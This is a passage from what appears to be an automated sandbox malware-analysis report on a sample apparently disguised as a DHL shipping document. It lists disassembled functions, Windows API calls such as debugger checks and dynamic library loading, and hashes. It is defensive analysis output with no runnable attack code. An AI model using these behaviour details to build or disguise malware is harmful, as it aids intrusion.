                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 372448540-1403004172
                                                                                    • Opcode ID: 8dceeb95626b17823bc14749bb0bcd4b16cda67281d8e0a66d454c8827b805a1
                                                                                    • Instruction ID: 8954260663816449aa3001995d9d7ddc05d08e0ae29c1a0c1bf8b2494bfb52bd
                                                                                    • Opcode Fuzzy Hash: 8dceeb95626b17823bc14749bb0bcd4b16cda67281d8e0a66d454c8827b805a1
                                                                                    • Instruction Fuzzy Hash: 4B01D471B41108EBDF18EBA0CD56BFF73A8EF15340F140129B841A32E1EE285E08D2B1
                                                                                    Function 00808D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                      • Part of subcall function 0080AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0080AABC
                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00808DEE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 372448540-1403004172
                                                                                    • Opcode ID: fb3429971a8b3a82de14119fdfca3a6058147a621a7f6565f65531be6d655e2b
                                                                                    • Instruction ID: 9b29010c8e018cc1b0b146502baa89d3e3acf21bef969ef2c0bacc84e96e149f
                                                                                    • Opcode Fuzzy Hash: fb3429971a8b3a82de14119fdfca3a6058147a621a7f6565f65531be6d655e2b
                                                                                    • Instruction Fuzzy Hash: 08018471B41109E7DB15E7A4CD46BFE77A8EB11350F140115B845A32D2DA295E08D2B1
                                                                                    Function 00814F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName_wcscmp
                                                                                    • String ID: #32770
                                                                                    • API String ID: 2292705959-463685578
                                                                                    • Opcode ID: 2c73f272fece02ae49850f824530ec59409b2d8c1372f5c29d7ab359a31f0996
                                                                                    • Instruction ID: b6fb611a07450bf457be894029658f4b8904d455e23517f156a2c62e88aa9e6c
                                                                                    • Opcode Fuzzy Hash: 2c73f272fece02ae49850f824530ec59409b2d8c1372f5c29d7ab359a31f0996
                                                                                    • Instruction Fuzzy Hash: 98E0D832A0022C6BE7209BA9AC4DFA7F7ACFB85B70F010167FD04D3151E9609A558BE1
                                                                                    Function 007EB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007EB314: _memset.LIBCMT ref: 007EB321
                                                                                      • Part of subcall function 007D0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007EB2F0,?,?,?,007B100A), ref: 007D0945
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,007B100A), ref: 007EB2F4
                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,007B100A), ref: 007EB303
                                                                                    Strings
                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007EB2FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                    • API String ID: 3158253471-631824599
                                                                                    • Opcode ID: cf95fb474c6aa7844ed9493119d11310632656ae1c100597d39577886f43c2f4
                                                                                    • Instruction ID: ea48cf6d393aaf70a945bfa17b6345a1e57fcc3ac3fd9ef67908c53fa5a502d6
                                                                                    • Opcode Fuzzy Hash: cf95fb474c6aa7844ed9493119d11310632656ae1c100597d39577886f43c2f4
                                                                                    • Instruction Fuzzy Hash: B4E06D70600741CBD720DF29D5093477AE4FF44315F00892DE896C7752EBB8E448CBA1
                                                                                    Function 007F1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 007F1775
                                                                                      • Part of subcall function 0082BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,007F195E,?), ref: 0082BFFE
                                                                                      • Part of subcall function 0082BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0082C010
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 007F196D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                    • String ID: WIN_XPe
                                                                                    • API String ID: 582185067-3257408948
                                                                                    • Opcode ID: 05bf4b4ed1a81480ca1522a09c2e81847b8674e4a27b604089fdf02ee9f7b52e
                                                                                    • Instruction ID: 36ebaf0a260ad82c3869382f78c30a764b670e7dd689d29901ff4218f63357aa
                                                                                    • Opcode Fuzzy Hash: 05bf4b4ed1a81480ca1522a09c2e81847b8674e4a27b604089fdf02ee9f7b52e
                                                                                    • Instruction Fuzzy Hash: 91F0397081000DDFCB15EB95CA88AFCBBF8BB58300FA00095E206A22A1D7788F84CF70
                                                                                    Function 00835998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008359AE
                                                                                    • PostMessageW.USER32(00000000), ref: 008359B5
                                                                                      • Part of subcall function 00815244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008152BC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: bd3b94034b10ad8dcf92f8323d4ae15e979b2ac6e5776d05eec36fc6eddf1561
                                                                                    • Instruction ID: ab9bbb9aebb6d7ac9f539d473d47c4f4c4ec62d14bddea5716b42eb85e18927a
                                                                                    • Opcode Fuzzy Hash: bd3b94034b10ad8dcf92f8323d4ae15e979b2ac6e5776d05eec36fc6eddf1561
                                                                                    • Instruction Fuzzy Hash: 9ED0C932780711BAE6A4AB709C0FFD76614FB94B50F010825B35AEA1E1D9E4A800CA94
                                                                                    Function 00835964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0083596E
                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00835981
                                                                                      • Part of subcall function 00815244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008152BC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: 5cd6e0311c0587a45c452916729f28d076a3d45376e6520512f4e1b822e55250
                                                                                    • Instruction ID: 4b8351492843f0b82e3cf51291d6d119d7f74ed8a06f341482c1c70b6dc7fcd3
                                                                                    • Opcode Fuzzy Hash: 5cd6e0311c0587a45c452916729f28d076a3d45376e6520512f4e1b822e55250
                                                                                    • Instruction Fuzzy Hash: 70D0C932784711B6E6A4AB709C0FFD76A14FF90B50F010825B35AEA1E1D9E49800CA94